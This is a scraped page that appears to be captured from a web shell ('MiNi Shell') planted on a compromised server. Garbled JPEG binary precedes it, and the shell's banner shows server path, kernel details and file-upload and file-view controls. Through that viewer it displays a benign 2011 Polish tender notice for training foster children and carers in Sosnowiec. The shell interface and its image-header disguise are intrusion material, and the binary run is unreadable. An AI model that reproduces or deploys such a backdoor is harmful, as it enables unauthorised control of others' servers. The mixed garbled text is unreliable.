JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/134004-N-2011.html

<p class="kh_header"><b>Sosnowiec: Organizacja i przeprowadzenie szkolenia wyjazdowego oraz szkolenia stacjonarnego z zakresu komunikacji interpersonalnej dla niepełnoletnich wychowanków rodzin zastępczych oraz ich opiekunów/rodziców zastępczych w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 134004 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu , ul. Mościckiego 14, 41-200 Sosnowiec, woj. śląskie, tel. 032 3680601, faks 032 3680614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopssosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkolenia wyjazdowego oraz szkolenia stacjonarnego z zakresu komunikacji interpersonalnej dla niepełnoletnich wychowanków rodzin zastępczych oraz ich opiekunów/rodziców zastępczych w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usług obejmujących:Organizacja i przeprowadzenie szkolenia wyjazdowego oraz szkolenia stacjonarnego z zakresu komunikacji interpersonalnej dla niepełnoletnich wychowanków rodzin zastępczych oraz ich opiekunów-rodziców zastępczych w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.
Realizacja przedmiotu zamówienia została podzielona na dwa moduły pierwszy wyjazdowy,1 do 3 lipca 2011r. dla 20 uczestników i drugi warsztatowy przewidziany na dowolną sobotę września 2011r. Zakończenie realizacji zamówienia 24.09.2011r.
Adresatami zadania są osoby: niepełnoletnie - wychowankowie rodzin zastępczych, nieaktywne zawodowo - uczące się, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym oraz ich opiekunowie/rodzice zastępczy. 
Liczba uczestników do 20 osób.
1.Miejsce i czas realizacji zadania-modułu pierwszy wyjazdowy.
2.1. Szkolenie wyjazdowe powinno być zrealizowane od 01.07.2011r. do 03.07.2011r. 
(2 noclegi).
2.2. Wyjazd dnia 01.07.2011r. o godz. 15.00. Powrót dnia 03.07.2011r. o godz. 18.00.
2.3. Zadanie winno być zrealizowane w promieniu do 150 km od siedziby Zamawiającego, w miejscowości atrakcyjnej turystycznie.
2.Szkolenie wyjazdowe z zakresu komunikacji interpersonalnej: 
Zajęcia o charakterze warsztatowym, interaktywnym, prowadzone powinny być w formie ćwiczeń indywidualnych i grupowych z zakresu komunikacji interpersonalnej i treningu asertywności- łącznie: 15 godzin zegarowych, a w szczególności:
3.1. Pierwszy dzień tj. piątek: gry i zabawy integracyjne w tym ognisko z pieczeniem kiełbasek - łącznie 3 godziny zegarowe. Zajęcia powinny mieć na celu zbudowanie atmosfery zaufania, poczucia bezpieczeństwa w grupie.
3.2. Drugi dzień tj. sobota - warsztaty- łącznie 7 godzin zegarowych. Zajęcia powinny  prowadzić do nabycia konkretnych umiejętności komunikowania się w relacjach rodzinnych. 
a) zajęcia powinny być prowadzone od śniadania do obiadu np. od 9.00 do 14.00 przerwa obiadowa następnie od 15.00 do 17.00 i zawierać następującą tematykę:
 zwiększenie świadomości znaczenia komunikacji niewerbalnej w kontaktach z ludźmi, 
wyrażanie własnych uczuć,
aktywne słuchanie,
skuteczna i prosta komunikacja,

 unikanie błędów w komunikacji,

zwiększenie zdolności zrozumiałego prezentowania swoich opinii, przekonań, myśli,
poprawa umiejętności nawiązywania i utrzymania pozytywnych relacji interpersonalnych, 
wzrost pewności siebie w sferze kontaktów interpersonalnych,
poznanie własnych mocnych i słabych stron w zakresie komunikacji,
b) integracja grupowa z wykorzystaniem atrakcji turystycznych danej miejscowości (z uwzględnieniem wieku i możliwości uczestników szkolenia) - zajęcia w terenie, odreagowanie napięcia emocjonalnego, wspólne wyjście do aqua parku, kręgielni itp. - 2 godziny zegarowe.
3.3. Trzeci dzień tj. niedziela - łącznie 5 godzin zegarowych np. od 9.00 do 14.00. Zajęcia powinny zawierać:
elementy treningu asertywności
sztuka mówienia nie bez poczucia winy
wyrażanie się poprzez komunikaty JA - klucz długofalowego porozumienia.
 trening podstawowych zachowań asertywnych - odgrywanie przed kamerą scenek odmawiania, stanowienia i obrony własnych granic oraz wyrażania próśb,
asertywność w ciele. Przekonujący język ciała - ćwiczenie postawy, głosu, gestów i mimiki.

Organizacja i prowadzenie zajęć warsztatowych - moduł drugi warsztatowy.
1.Adresaci zadania: 
Adresatami zadania są osoby: niepełnoletnie - wychowankowie rodzin zastępczych , nieaktywne zawodowo - uczące się, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym oraz ich opiekunowie-rodzice zastępczy. 
Liczba uczestników do 20 osób.
2.Szkolenie warsztatowe powinno obejmować:
2.1.Przeprowadzenie zajęć warsztatowych, stacjonarnych z zakresu komunikacji interpersonalnej i asertywności. pogłębiających zdobytą wiedzę podczas szkolenia wyjazdowego - w grupach średnio 10 osobowych z zastrzeżeniem, iż niepełnoletni wychowanek będzie wraz z opiekunem w tej samej grupie.
2.2.Każda grupa uczestniczyć będzie w zajęciach trwających 6 godzin dydaktycznych w dowolną sobotę września. Zamówienie powinno być zrealizowane w godzinach od 8.00 do 15.00.
3.Miejsce i czas realizacji zadania:
3.1. Szkolenie powinno być zrealizowane na terenie miasta Sosnowca we wrześniu 2011r.
3.2. Wymagany termin zakończenia realizacji zadania do 24.09.2011r. 
Szczegółowy opis przedmiotu zamówienia w zakresie modułu pierwszego i drugiego zamieszczono w załączniku nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-9, 80.51.10.00-9, 55.10.00.00-1, 63.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Zamawiający oceni spełnienie warunku wyłącznie na podstawie załączonego oświadczenia złożonego na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunku zostanie przeprowadzona na podstawie załączonego oświadczenia złożonego zgodnie z art.22 ust.1 ustawy metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Zamawiający oceni spełnienie warunku wyłącznie na podstawie załączonego oświadczenia złożonego na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunku zostanie przeprowadzona na podstawie załączonego oświadczenia złożonego zgodnie z art.22 ust.1 ustawy metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda wykazania, iż Wykonawca dysponuje potencjałem technicznym tj:
Wykonawca dysponuje ośrodkiem, który będzie posiadał: 

a)zaplecze socjalne i sanitarne przygotowane do przyjmowania grup szkoleniowych, 
b)miejsce niezbędne do zorganizowania ogniska i dyskoteki, 
c)pokoje mieszkalne 2 osobowe z pełnym węzłem sanitarnym, wyposażone w jednoosobowe miejsca do spania z dostępem do sieci WI-FI, telewizorem i radiem.

Wykonawca w zakresie modułu pierwszego wyjazdowego dysponuje 2 salami, które winny być:
a)wyposażone w odpowiednią liczbę miejsc siedzących i stolików,
b)wyposażone w odpowiednie oprzyrządowania techniczne                         tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart, komplet mazaków,
c)przystosowane pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń,
d)znajdujące się na terenie ośrodka, w którym będą zakwaterowani uczestnicy,
e)nie będące jednocześnie salami jadalnymi,
f)posiadające dostęp do źródeł prądu,
g)mające możliwość swobodnego przestawiania krzeseł i stołów,
h)mające optymalne warunki prowadzenia zajęć szkoleniowych w grupach 10 osobowych + trener, 
i)mające odpowiednie oświetlenie: dostęp światła dziennego oraz całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
j)mające miejsce na umieszczenie serwisu kawowego dla uczestników-uczestniczek szkoleń,
k)mające odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia warsztatów, 
l)klimatyzowane,
m)o powierzchni co najmniej 25 m2 każda.

Wykonawca w zakresie modułu drugiego warsztatowego dysponuje 2 salami, które winny być:

a)wyposażone w odpowiednią liczbę miejsc siedzących i stolików,
b)wyposażone w odpowiednie oprzyrządowania techniczne  tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart, komplet mazaków.
c)przystosowane pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń,
d)znajdujące się na terenie Sosnowca,
e)nie będące jednocześnie salami jadalnymi,
f)posiadające dostęp do źródeł prądu,
g)mające możliwość swobodnego przestawiania krzeseł i stołów,
h)mające optymalne warunki prowadzenia zajęć szkoleniowych w grupach 10 osobowych + trener, 
i)mające odpowiednie oświetlenie: dostęp światła dziennego oraz całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
j)mające miejsce na umieszczenie serwisu kawowego dla uczestników-uczestniczek szkoleń,
k)mające odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia warsztatów, 
l)klimatyzowane
m)winny mieć co najmniej 25 m2 każda.
Ocena spełnienia warunku zostanie przeprowadzone na podstawie załączonego wykazu potencjału technicznego metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał, iż dysponuje 2 specjalistami z wyższym wykształceniem psychologicznym, posiadających co najmniej 3 letnie doświadczenie w prowadzeniu przedmiotowych zajęć(treningów komunikacji interpersonalnej i treningów asertywności), którzy przeprowadzili co najmniej 4 szkolenia o tematyce treningi komunikacji interpersonalnej i treningi asertywności w okresie trzech lat przed wszczęciem postępowania. Podane warunki będzie spełniać każda ze wskazanych w wykazie osób.Ocena spełnienia warunku zostanie przeprowadzone na podstawie załączonego wykazu osób metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Zamawiający oceni spełnienie warunku wyłącznie na podstawie załączonego oświadczenia złożonego na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełnienia warunku zostanie przeprowadzona na podstawie załączonego oświadczenia złożonego zgodnie z art.22 ust.1 ustawy metodą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo: 
-Pełnomocnictwo wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazana w aktualnym odpisie z właściwego rejestru.

-Pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia w sytuacji, o której mowa w art. 22 ust.2b ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się wprowadzania istotnych zmian w umowie z naruszeniem art.144 ust. 1 ustawy Prawo zamówień publicznych, z zastrzeżeniem ust. 4 niniejszej umowy.
4. Zamawiający przewiduje możliwość zmiany umowy w formie pisemnej pod rygorem nieważności tylko w sytuacji:
a) zmiany miejsca zakwaterowania lub sal szkoleniowych, z przyczyn niezależnych od Wykonawcy, pod warunkiem, że miejsce zakwaterowania lub sale szkoleniowe będą spełniać wymogi określone w załączniku nr 7 do niniejszej umowy, 
b) zmiany terminu realizacji zamówienia z powodu przedłużającej się procedury przetargowej wyłącznie odnośnie modułu pierwszego,
c) zmiany harmonogramu zamówienia z przyczyn niezależnych od Wykonawcy odnośnie modułu pierwszego i drugiego,
d) zmiany osób posiadających uprawnienia, odpowiednie kwalifikacje i doświadczenie do należytego wykonania zamówienia z zastrzeżeniem § 1 ust. 4 niniejszej umowy tj.Dopuszcza się możliwość zmian personalnych odnośnie osób stanowiących kadrę, o której mowa w ust. 3, po uzyskaniu zgody Zamawiającego. Wykonawca zobowiązany jest zwrócić się do Zamawiającego z pisemnym wnioskiem o wyrażenie zgody na taką zmianę załączając do niego informację potwierdzającą posiadanie uprawnień, kwalifikacji oraz doświadczenia osób - zastępców zgodnych z wymaganiami Zamawiającego określonymi w załączniku nr 6 do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.sosnowiec.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mościckiego 14, 41-200 Sosnowiec piętro III p. 321..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2011 godzina 11:30, miejsce: Mościckiego 14, 41-200 Sosnowiec piętro IV p. 422..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT MODA NA SUKCES CZYLI KROKI W SAMODZIELNOŚĆ WSPÓŁFINANSOWANY ZE ŚRODKÓW UNII EUROPEJSKIEJ Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PRIORYTETU VII DZIAŁANIE 7.1. PODDZIAŁANIA 7.1.1.PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com